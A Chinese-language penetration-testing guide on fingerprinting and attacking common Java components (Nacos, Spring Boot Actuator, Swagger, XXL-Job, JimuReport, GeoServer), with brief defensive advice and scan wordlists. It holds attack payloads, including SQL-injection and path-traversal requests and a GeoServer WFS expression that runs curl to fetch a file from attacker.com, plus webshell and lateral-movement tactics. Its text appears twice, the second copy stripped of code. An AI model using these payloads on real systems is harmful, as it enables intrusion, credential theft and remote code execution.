攻防Java常见组件:打点思路、指纹识别
字数 1762 2025-09-01 11:26:10

Java组件攻防实战:打点思路与指纹识别技术

1. 指纹识别技术

1.1 常见Java组件指纹特征

Nacos服务识别

  • 默认端口:8848
  • 识别特征:响应页面包含"Nacos Console"
  • 风险:未授权访问可获取服务配置信息,篡改数据流向

Spring Boot识别

  • 关键端点:/actuator
    • /env路径:泄露云密钥、数据库凭证
    • /heapdump:可逆向破解Shiro密钥
  • 错误页面特征:"Whitelabel Error Page"

Swagger识别

  • 常见路径
    • /swagger-ui.html
    • /v2/api-docs
    • /swagger-resources
  • 识别特征:包含"Swagger UI"标题或JSON格式API描述

XXL-Job识别

  • 管理后台路径:/xxl-job-admin/
  • 特征文件:xxl-job-admin.css/js

积木报表(Jeecg-Boot)识别

  • 特征路径:/jmreport/testConnection
  • 常见漏洞:SQL注入、未授权访问

1.2 指纹识别工具与方法

  • 搜索引擎:Shodan、FOFA、Quake、Hunter
  • 扫描工具
    • Nuclei模板
    • MingDong
    • GatherBurp插件
  • 自定义脚本:基于响应特征编写识别规则

2. 路由机制与API渗透

2.1 路由基础概念

  • 传统Web路由:文件系统路径映射(如.php/.jsp)
  • 现代Java路由
    • Spring MVC注解路由(@RequestMapping)
    • 动态参数支持(/users/{id})
  • Nginx反向代理路由
    • location指令实现路径重写
    • 潜在风险:路径穿越、配置错误

2.2 路由相关漏洞

  • 路径参数注入
    GET /api/users/1;DROP TABLE users HTTP/1.1
  • 路径遍历变种
    GET /api/logs?file=etc/passwd HTTP/1.1
  • 未授权访问绕过
    • 十六进制编码:/%61%64%6d%69%6e/dashboard
    • 路径混淆:/api../admin → 后端/admin

2.3 路由发现技术

  • 目录扫描工具:Dirsearch、spray
  • 敏感路径探测
    • /actuator
    • /admin
    • /debug
  • API文档探测:Swagger、OpenAPI

3. 历史漏洞利用

3.1 Spring Boot漏洞

  • Actuator端点字典
    /actuator/env
/actuator/heapdump
/actuator/gateway/routes/test
/nacos/actuator/env
  • Spring Gateway RCE
    1. 创建test路由执行系统命令
    2. 刷新路由实现RCE

3.2 Nacos漏洞

  • 未授权访问路径
    /nacos/v1/auth/users
/nacos/v1/cs/configs
/nacos/v1/console/server/state
  • 利用方式
    • 获取敏感配置
    • 篡改服务注册数据
    • 数据库操作(Derby SQL执行)

3.3 Swagger漏洞

  • 利用方式
    • 接口枚举与爆破
    • 参数注入(SQL/XSS)
    • 敏感信息泄露

3.4 XXL-Job漏洞

  • 关键路径
    /xxl-job-admin/api
/xxl-job-admin/joblog
  • 利用方式
    • 未授权访问后台
    • 创建恶意任务执行命令

3.5 积木报表漏洞

  • 特征路径:/jmreport/list
  • 常见漏洞
    • SQL注入
    • 未授权访问
    • 权限绕过

3.6 Geoserver漏洞

  • 利用路径:/geoserver/wfs
  • 利用方式
    <wfs:valueReference>exec(java.lang.Runtime.getRuntime(),'curl http://attacker.com/exp -o /tmp/1')</wfs:valueReference>

4. 实战渗透策略

4.1 闪击战阶段

  • 快速定位目标
    • 使用指纹识别规则批量扫描
    • 关注路由API相关端口和路径
  • 效率优先
    • 优先利用已知Nday漏洞
    • 避免过度纠缠逻辑漏洞

4.2 漏洞利用阶段

  1. Spring Gateway:尝试RCE
  2. Nacos:获取配置,篡改服务
  3. Swagger:接口爆破
  4. XXL-Job:创建恶意任务

4.3 后渗透阶段

  • 权限维持:植入WebShell
  • 横向移动
    • 分析API调用链
    • 通过路由API渗透内网
    • 数据库服务器攻击

5. 防御建议

  1. 组件安全
    • 及时更新Java组件版本
    • 禁用不必要的Actuator端点
  2. 路由安全
    • 严格校验路径参数
    • 避免路径遍历漏洞
  3. 访问控制
    • 为Swagger、Nacos等添加认证
    • 实施最小权限原则
  4. 监控预警
    • 监控异常API调用
    • 建立漏洞应急响应机制

附录:实用资源

Spring Boot Actuator扫描字典

/actuat%6fr/env
/prod-api/actuator/env
/xxl-job-admin/actuator/env
/nacos/actuator/env
/actuator/gateway/routes/test

Nacos扫描字典

/nacos/v1/auth/users?pageNo=1
/nacos/v1/cs/ops/derby?sql=select * from users
/nacos/v1/console/server/state

自动化工具推荐

  1. Nuclei:定制漏洞检测模板
  2. Burp Suite插件:
    • GatherBurp
    • MingDong
  3. 目录扫描工具:
    • Dirsearch
    • spray
Java组件攻防实战:打点思路与指纹识别技术 1. 指纹识别技术 1.1 常见Java组件指纹特征 Nacos服务识别 默认端口 :8848 识别特征 :响应页面包含"Nacos Console" 风险 :未授权访问可获取服务配置信息,篡改数据流向 Spring Boot识别 关键端点 :/actuator /env路径:泄露云密钥、数据库凭证 /heapdump:可逆向破解Shiro密钥 错误页面特征 :"Whitelabel Error Page" Swagger识别 常见路径 : /swagger-ui.html /v2/api-docs /swagger-resources 识别特征 :包含"Swagger UI"标题或JSON格式API描述 XXL-Job识别 管理后台路径 :/xxl-job-admin/ 特征文件 :xxl-job-admin.css/js 积木报表(Jeecg-Boot)识别 特征路径 :/jmreport/testConnection 常见漏洞 :SQL注入、未授权访问 1.2 指纹识别工具与方法 搜索引擎 :Shodan、FOFA、Quake、Hunter 扫描工具 : Nuclei模板 MingDong GatherBurp插件 自定义脚本 :基于响应特征编写识别规则 2. 路由机制与API渗透 2.1 路由基础概念 传统Web路由 :文件系统路径映射(如.php/.jsp) 现代Java路由 : Spring MVC注解路由(@RequestMapping) 动态参数支持(/users/{id}) Nginx反向代理路由 : location指令实现路径重写 潜在风险:路径穿越、配置错误 2.2 路由相关漏洞 路径参数注入 : 路径遍历变种 : 未授权访问绕过 : 十六进制编码:/%61%64%6d%69%6e/dashboard 路径混淆:/api../admin → 后端/admin 2.3 路由发现技术 目录扫描工具 :Dirsearch、spray 敏感路径探测 : /actuator /admin /debug API文档探测 :Swagger、OpenAPI 3. 历史漏洞利用 3.1 Spring Boot漏洞 Actuator端点字典 : Spring Gateway RCE : 创建test路由执行系统命令 刷新路由实现RCE 3.2 Nacos漏洞 未授权访问路径 : 利用方式 : 获取敏感配置 篡改服务注册数据 数据库操作(Derby SQL执行) 3.3 Swagger漏洞 利用方式 : 接口枚举与爆破 参数注入(SQL/XSS) 敏感信息泄露 3.4 XXL-Job漏洞 关键路径 : 利用方式 : 未授权访问后台 创建恶意任务执行命令 3.5 积木报表漏洞 特征路径 :/jmreport/list 常见漏洞 : SQL注入 未授权访问 权限绕过 3.6 Geoserver漏洞 利用路径 :/geoserver/wfs 利用方式 : 4. 实战渗透策略 4.1 闪击战阶段 快速定位目标 : 使用指纹识别规则批量扫描 关注路由API相关端口和路径 效率优先 : 优先利用已知Nday漏洞 避免过度纠缠逻辑漏洞 4.2 漏洞利用阶段 Spring Gateway :尝试RCE Nacos :获取配置,篡改服务 Swagger :接口爆破 XXL-Job :创建恶意任务 4.3 后渗透阶段 权限维持 :植入WebShell 横向移动 : 分析API调用链 通过路由API渗透内网 数据库服务器攻击 5. 防御建议 组件安全 : 及时更新Java组件版本 禁用不必要的Actuator端点 路由安全 : 严格校验路径参数 避免路径遍历漏洞 访问控制 : 为Swagger、Nacos等添加认证 实施最小权限原则 监控预警 : 监控异常API调用 建立漏洞应急响应机制 附录:实用资源 Spring Boot Actuator扫描字典 Nacos扫描字典 自动化工具推荐 Nuclei:定制漏洞检测模板 Burp Suite插件: GatherBurp MingDong 目录扫描工具: Dirsearch spray